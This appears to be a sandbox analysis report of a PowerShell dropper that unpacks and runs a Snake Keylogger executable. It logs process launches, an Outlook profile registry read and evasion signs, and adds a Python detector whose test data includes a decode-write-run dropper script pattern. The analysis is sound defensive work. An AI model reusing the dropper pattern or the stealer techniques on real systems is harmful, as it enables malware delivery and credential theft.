Source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.x.exe.4329590.3.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@8/14@5/7
Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log
Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tm4nhvmr.qwh.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: DON.ps1 | Virustotal: Detection: 20%
Source: DON.ps1 | ReversingLabs: Detection: 28%
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\DON.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: CZG3HF22.pdb source: x.exe, 00000004.00000000.1110223011.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

                      Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAF
Source: x.exe.0.dr | Static PE information: 0xDD796550 [Tue Sep 30 00:35:28 2087 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_05012B2B push eax; iretd 0_2_05012B39
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_07BE27B4 push esp; ret 4_2_07BE27B7
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_07BE2C97 push esi; iretd 4_2_07BE2CEC
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D59D2A push esp; ret 4_2_00D59D2B
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655C7F2 push eax; ret 5_2_0655C7F9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_06552E60 push es; ret 5_2_06552E70
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655AD70 push es; ret 5_2_0655AD80
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_070606C0 push es; ret 5_2_070606D0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0706CC02 push cs; retf 5_2_0706CC09
Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
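The FromBase64String() argument that AMSI captured above begins with TVqQ, which is the base64 encoding of the MZ DOS header, and the dropped x.exe carries a COFF TimeDateStamp of 0xDD796550, a date in 2087. The Python below is an added example, not code from the Joe Sandbox report, from the sample or from the MassLogger project: it pulls quoted FromBase64String() literals out of a PowerShell script, decodes them (tolerating the truncated, unpadded form AMSI logs often show), checks for the MZ and PE signatures and the DOS stub text, reads the COFF timestamp and flags one that lies in the future. The dropper script and the PE image it scans are constructed in the code as test data; only the timestamp value is taken from the report.

```python
"""Find FromBase64String() blobs in a PowerShell script that decode to a
Windows PE and report the COFF build timestamp of each one.

Added example, not code from the Joe Sandbox report or from the sample.
The script and PE it scans are constructed inline; only the timestamp
value 0xDD796550 is taken from the report."""
import base64
import re
import struct
from datetime import datetime, timedelta, timezone

# Quoted literal argument of FromBase64String(...). PowerShell also accepts a
# variable or expression there; those forms are not matched by this regex.
B64_CALL = re.compile(
    r'FromBase64String\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)', re.IGNORECASE)

DOS_STUB = b"This program cannot be run in DOS mode."
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def decode_loose(b64):
    """Decode base64 even when the blob was logged truncated (no padding,
    odd length), as AMSI captures often are."""
    s = re.sub(r"\s+", "", b64).rstrip("=")
    if len(s) % 4 == 1:          # one dangling char cannot carry a full byte
        s = s[:-1]
    return base64.b64decode(s + "=" * (-len(s) % 4))


def parse_pe(data):
    """Return (machine, section_count, timestamp) for a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # "PE\0\0" signature followed by the 20-byte COFF file header
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, sections, timestamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return machine, sections, timestamp


def scan_script(text, now_epoch):
    """Return one finding per base64 literal that decodes to a PE."""
    findings = []
    for m in B64_CALL.finditer(text):
        try:
            blob = decode_loose(m.group(1))
        except ValueError:
            continue
        pe = parse_pe(blob)
        if pe is None:
            continue
        machine, sections, timestamp = pe
        findings.append({
            "offset": m.start(),
            "machine": machine,
            "sections": sections,
            "timestamp": timestamp,
            "built": (EPOCH + timedelta(seconds=timestamp)).isoformat(),
            "future_timestamp": timestamp > now_epoch,
            "dos_stub": DOS_STUB in blob,
        })
    return findings


def build_test_pe(timestamp, machine=0x14C, sections=3):
    """Constructed minimal PE (DOS header, stub text, PE signature, COFF
    header) used as test input. It is not the dropped x.exe."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    dos[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    coff = struct.pack("<HHIIIHH", machine, sections, timestamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


REPORTED_TIMESTAMP = 0xDD796550   # value Joe Sandbox shows for x.exe.0.dr

# Constructed dropper script in the shape the report describes: decode the
# blob, write it to %TEMP%\x.exe, run it. The second literal is plain text.
SAMPLE_SCRIPT = (
    '$b = [System.Convert]::FromBase64String("'
    + base64.b64encode(build_test_pe(REPORTED_TIMESTAMP)).decode()
    + '")\n'
    '[System.IO.File]::WriteAllBytes("$env:TEMP\\x.exe", $b)\n'
    'Start-Process "$env:TEMP\\x.exe"\n'
    '$greeting = [System.Convert]::FromBase64String("SGVsbG8gV29ybGQ=")\n'
)

if __name__ == "__main__":
    now = int(datetime.now(timezone.utc).timestamp())
    for f in scan_script(SAMPLE_SCRIPT, now):
        flag = "FUTURE" if f["future_timestamp"] else "ok"
        print(f"offset {f['offset']}: machine=0x{f['machine']:X} "
              f"sections={f['sections']} TimeDateStamp=0x{f['timestamp']:08X} "
              f"({f['built']}) [{flag}]")
```

Two caveats apply when using this against real samples. AMSI saw the literal because PowerShell hands it the fully assembled string at call time; a regex over the .ps1 on disk only catches literals, so a blob that is concatenated, reversed or held in a variable needs the script run under AMSI or PowerShell script block logging (event 4104) to recover it. The timestamp check is weaker for .NET binaries than for native ones: Roslyn deterministic builds store a content hash in TimeDateStamp, typically with the high bit set, so an impossible date on an MSIL file like x.exe can be a build artefact rather than timestomping. Treat the future date as a pivot that corroborates the other signatures, not as evidence on its own.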
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (71 identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: NOOPENFILEERRORBOX (98 identical entries)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Memory allocated: D50000, 2B00000, 2810000, 5080000, 6080000, 61B0000, 71B0000, 2AA0000, 2CE0000, 2B00000  memory reserve | memory write watch (10 allocations)
                      The .NET garbage collector reserves its heap segments with MEM_WRITE_WATCH, so this signature fires on most managed binaries; treat it as corroborating, not primary, evidence of sandbox evasion.
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477 (2 events)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Thread delayed: delay time: 922337203685477 (2 events)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2913
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Window / User API: threadDelayed 2643
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Window / User API: threadDelayed 7171
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Window / User API: foregroundWindowGot 1768
                      922337203685477 is 2^63 / 10000: Sleep(INFINITE) reaches NtDelayExecution as the most negative 64-bit 100 ns interval, and Joe Sandbox renders it in milliseconds. These rows are indefinite waits (a thread parked for the life of the process), not timed sleeps, and the threadDelayed / foregroundWindowGot numbers are call counts, not durations.
